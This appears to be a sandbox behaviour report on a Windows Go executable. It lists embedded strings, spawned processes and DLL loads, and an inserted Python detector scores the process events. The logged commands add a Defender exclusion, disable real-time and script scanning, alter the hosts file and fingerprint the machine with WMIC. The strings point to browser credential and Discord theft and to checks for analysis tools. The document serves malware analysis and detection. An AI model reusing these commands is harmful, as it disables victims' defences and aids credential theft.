Source: file.exe, 00000000.00000002.1521365374.00007FF60A08C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, file.exe, 00000000.00000002.1521365374.00007FF60A08C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: file.exe, file.exe, 00000000.00000002.1521365374.00007FF60A08C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.1502296845.0000022DFC8D5000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1502749198.0000022DFC970000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, file.exe, 00000000.00000002.1521365374.00007FF60A08C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe | String found in binary or memory: C:/Program Files/Go/src/net/addrselect.go
Source: file.exe | String found in binary or memory: slateNameWgetprotobyname procedure in winapi error #RegSetValueExWSystrayMonitorFyne error: %v ... omitting arrow-back.svgarrow-down.svgfile-audio.svgfile-image.svgfile-video.svgfolder-new.svgmail-reply.svgmedia-play.svgmedia-stop.svgvisibility.svgcolorChromat
Source: file.exe | String found in binary or memory: C:/Users/Tundara/go/pkg/mod/fyne.io/fyne/v2@v2.5.2/internal/metadata/load.go
Source: file.exe | String found in binary or memory: current map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:second
Source: file.exe | String found in binary or memory: tupInfoWProcess32FirstWUnmapViewOfFileFailed to load Failed to find RegCreateKeyExWRegDeleteValueWnot a valid URImenu-expand.svgcontent-add.svgcontent-cut.svgfolder-open.svgmedia-music.svgmedia-photo.svgmedia-video.svgmedia-pause.svgvolume-down.svgvolume-mute.
Source: file.exe | String found in binary or memory: data/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed
Source: file.exe | String found in binary or memory: ... omitting arrow-back.svgarrow-down.svgfile-audio.svgfile-image.svgfile-video.svgfolder-new.svgmail-reply.svgmedia-play.svgmedia-stop.svgvisibility.svgcolorChromaticdocumentCreatemoreHorizontalmailAttachmentviewFullScreendisabledButtonmenuBackgroundscrollBarSmallsubHeadingTextFSNOTIFY_DEBUGGetWindowTextAksdumperclienthttpdebuggeruiprocess hackersimpleassemblysystemexplorervirustotal.comtrendmicro.com-ExclusionPath-MAPSReportingOpenSCManagerWModule32FirstWunreachable: mime/multipartContent-LengthMAX_FRAME_SIZEPROTOCOL_ERRORINTERNAL_ERRORREFUSED_STREAMERR_UNKNOWN_%daccept-charsetcontent-lengthread_frame_eofinternal errorunknown error unknown code: Not AcceptableNotInitializedAPIUnavailablenot a PNG fileDefWindowProcWTrackPopupMenuTaskbarCreated.WithoutCancel.WithDeadline(rectangle.fragrectangle.vertsimple_es.fragsimple_es.vertrect_size_halfunexpected '='unexpected '.'InlineTableEndControlServiceCreateServiceWIsWellKnownSidMakeAbsoluteSDSetThreadTokenClearCommBreakClearCommErrorCreateEventExWCreateMutexExWGetTickCount64IsWow64ProcessLoadLibraryExWSetConsoleModeSizeofResourceVirtualProtectVirtualQueryExCoInitializeExCoUninitializeGetShellWindowVerQueryValueWunknown markerbad RST markerinvalid pid %vEnumPageFilesWsignons.sqlitecookies.sqliteempty passwordfile:///(.*?),Discord Canary` - Members: `intentlauncherlauncherconfigpaladium-groupBadlion Clientbad record MACAccept-CharsetDkim-Signatureunknown mode: need more dataREQUEST_METHODprefix length not an ip:portinvalid Prefixlen of type %snot a BMP fileultracondensedextracondensedguillemotrightguilsinglrightperiodcenteredquotesinglbaseAR MingtiM KSCIPAMonaPGothicAR MinchoL JISIPAMonaPMinchoAR PL UMing CNAR PL UMing TWAR PL UMing HKTeX Gyre HerosNimbus Mono PSTeX Gyre BonumURW Chancery LURW Palladio LCumberland AMTBaekmuk BatangMgOpen ModernaSegoe UI EmojiCentury GothicSUSE Sans MonoLohit AssamesePersian_squareHapax Berb
Source: file.exe | String found in binary or memory: morebuf={pc:: no frame (sp=runtime: frame ts set in timertraceback stuckadvertise errorkey has expirednetwork is downno medium foundno such processGetAdaptersInfoCreateHardLinkWDeviceIoControlFlushViewOfFileGetCommandLineWGetStartupInfoWProcess32FirstWUnmapViewOfFileFailed to load Failed to find RegCreateKeyExWRegDeleteValueWnot a valid URImenu-expand.svgcontent-add.svgcontent-cut.svgfolder-open.svgmedia-music.svgmedia-photo.svgmedia-video.svgmedia-pause.svgvolume-down.svgvolume-mute.svgcolorAchromaticmediaFastRewindfileApplication%-13s %q
Source: file.exe | String found in binary or memory: EOF: expected length: %d, got %dreading MorxSubtableLigature: %sreading OTKernSubtableHeader: %sunsupported CaretValue format %dreading ChainedContextualPos: %sreading TupleVariationHeader: %scharstring type %d not supportedinvalid operator %s in Font Dictinvalid custom charset format %dinvalid local subroutines offsetunsupported setjmp/longjmp usageinput overflows the modulus sizechacha20: invalid buffer overlapunsupported real number encodinghtmlindex: invalid encoding namefailed to lookup build executableFailed to parse user theme file: release of handle with refcount 0142108547152020037174224853515625710542735760100185871124267578125reflect: slice index out of rangereflect: NumOut of non-func type of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangereflect.Value.Equal: invalid Kind to pointer to array with length sync: RUnlock of unlocked RWMutexslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of rangetoo many levels of symbolic linksInitializeProcThreadAttributeListbytes.Buffer.Grow: negative countbytes.Reader.Seek: invalid whence-DisableIntrusionPreventionSystemskip 
everything and stop the walkGetVolumeNameForVolumeMountPointWwaiting for unsupported file typeGODEBUG: no value specified for "pseudo header field after regularhttp: invalid Read on closed Bodynet/http: skip alternate protocolhttp: CloseIdleConnections calledapplication/x-www-form-urlencodedinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vconnection not allowed by rulesetinvalid username/password versionunsupported transfer encoding: %qCould not parse fallback templatefailed to link OpenGL program:
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\attrib.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\attrib.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get Name
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
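The process-creation lines above are the detectable core of this sample: a Defender exclusion for its own path, a single Set-MpPreference call that turns off real-time, IOAV and script scanning and silences cloud reporting, an attrib -r / +r pair around the hosts file, and four WMIC fingerprint queries in quick succession. The following is an added example, not code from the report or from the sample, that scores Sysmon event 1 / 4688-style process-creation records for exactly this pattern. The event list is constructed from the command lines in this report plus two benign controls; the tables of weakening switch values and fingerprint WMI classes are assumptions drawn from the cmdlets' documented options, not from the report.

```python
"""Score process-creation events for the pattern this report lists.

Added example, not code from the report or the sample. EVENTS is constructed
from the command lines above (Sysmon event 1 / 4688 style) plus two benign
controls; switch/value tables are assumptions from the cmdlets' documented options.
"""
import shlex
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    parent: str   # image path of the creating process
    image: str    # image path of the created process
    cmdline: str  # command line as logged

@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str
    subject: str  # offending command line, or the parent image for aggregates

# Set-MpPreference switches and the values that weaken Defender.
MP_WEAKENING = {
    "-disableintrusionpreventionsystem": {"$true", "1"},
    "-disableioavprotection": {"$true", "1"},
    "-disablerealtimemonitoring": {"$true", "1"},
    "-disablescriptscanning": {"$true", "1"},
    "-enablecontrolledfolderaccess": {"disabled", "0"},
    "-enablenetworkprotection": {"auditmode", "disabled", "0", "2"},
    "-mapsreporting": {"disabled", "0"},
    "-submitsamplesconsent": {"neversend", "2"},
}
EXCLUSION_SWITCHES = {"-exclusionpath", "-exclusionprocess", "-exclusionextension"}
# WMI classes commonly queried to fingerprint the host or spot a sandbox.
WMI_FINGERPRINT_CLASSES = {"os", "cpu", "csproduct", "bios", "baseboard", "diskdrive", "win32_videocontroller", "win32_computersystem"}

FILE_EXE = r"C:\Users\user\Desktop\file.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ATTRIB = r"C:\Windows\System32\attrib.exe"
WMIC = r"C:\Windows\System32\wbem\WMIC.exe"
EVENTS = [
    ProcEvent(FILE_EXE, POWERSHELL, "powershell -Command Add-MpPreference -ExclusionPath " + FILE_EXE),
    ProcEvent(FILE_EXE, POWERSHELL,
              "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true "
              "-DisableIOAVProtection $true -DisableRealtimeMonitoring $true "
              "-DisableScriptScanning $true -EnableControlledFolderAccess Disabled "
              "-EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled "
              "-SubmitSamplesConsent NeverSend"),
    ProcEvent(FILE_EXE, ATTRIB, r"attrib -r C:\Windows\System32\drivers\etc\hosts"),
    ProcEvent(FILE_EXE, ATTRIB, r"attrib +r C:\Windows\System32\drivers\etc\hosts"),
    ProcEvent(FILE_EXE, WMIC, "wmic os get Caption"),
    ProcEvent(FILE_EXE, WMIC, "wmic cpu get Name"),
    ProcEvent(FILE_EXE, WMIC, "wmic path win32_VideoController get name"),
    ProcEvent(FILE_EXE, WMIC, "wmic csproduct get UUID"),
    # Benign controls (constructed): a lone inventory query, and real-time scanning switched back on.
    ProcEvent(r"C:\Windows\System32\cmd.exe", WMIC, "wmic os get Caption"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", POWERSHELL,
              "powershell Set-MpPreference -DisableRealtimeMonitoring $false"),
]

def words(cmdline):
    toks = shlex.split(cmdline, posix=False)  # posix=False keeps Windows backslashes literal
    return toks, [t.strip('"').lower() for t in toks]

def check_defender(ev):
    toks, low = words(ev.cmdline)
    out = []
    if "add-mppreference" in low:
        pairs = [f"{toks[i]} {toks[i + 1]}" for i, t in enumerate(low[:-1]) if t in EXCLUSION_SWITCHES]
        if pairs:
            out.append(Finding("defender_exclusion", ", ".join(pairs), ev.cmdline))
    if "set-mppreference" in low:
        hits = [toks[i] for i, t in enumerate(low[:-1]) if t in MP_WEAKENING and low[i + 1] in MP_WEAKENING[t]]
        if hits:
            out.append(Finding("defender_weakened", ", ".join(hits), ev.cmdline))
    return out

def check_hosts(ev):
    _, low = words(ev.cmdline)
    if not ev.image.lower().endswith("\\attrib.exe") or not any(t.endswith("\\drivers\\etc\\hosts") for t in low):
        return []
    action = "clears read-only" if "-r" in low else "sets read-only" if "+r" in low else "changes attributes"
    return [Finding("hosts_attrib", action, ev.cmdline)]

def wmi_class(ev):
    _, low = words(ev.cmdline)
    if not ev.image.lower().endswith("\\wmic.exe") or len(low) < 2:
        return None
    cls = low[2] if low[1] == "path" and len(low) > 2 else low[1]  # "wmic path <class> get ..."
    return cls if cls in WMI_FINGERPRINT_CLASSES else None

def check_fingerprint_bursts(events, threshold=3):
    """Distinct fingerprint classes per parent; one inventory query is not a burst."""
    per_parent = {}
    for ev in events:
        cls = wmi_class(ev)
        if cls:
            per_parent.setdefault(ev.parent, set()).add(cls)
    return [Finding("wmi_fingerprint_burst", ", ".join(sorted(c)), p)
            for p, c in per_parent.items() if len(c) >= threshold]

def score_events(events):
    per_event = [f for ev in events for f in check_defender(ev) + check_hosts(ev)]
    return per_event + check_fingerprint_bursts(events)

if __name__ == "__main__":
    print(*score_events(EVENTS), sep="\n")
```

Against the constructed events this yields five findings: one exclusion, one weakening call listing all eight switches, two hosts attribute changes, and one fingerprint burst attributed to file.exe; the two controls produce nothing. The burst rule keys on distinct classes per parent rather than on any single wmic invocation, which is what keeps ordinary inventory scripts out of the alert stream.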
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: opengl32.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: glu32.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dinput8.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: xinput1_4.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: devobj.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: inputhost.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: hid.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
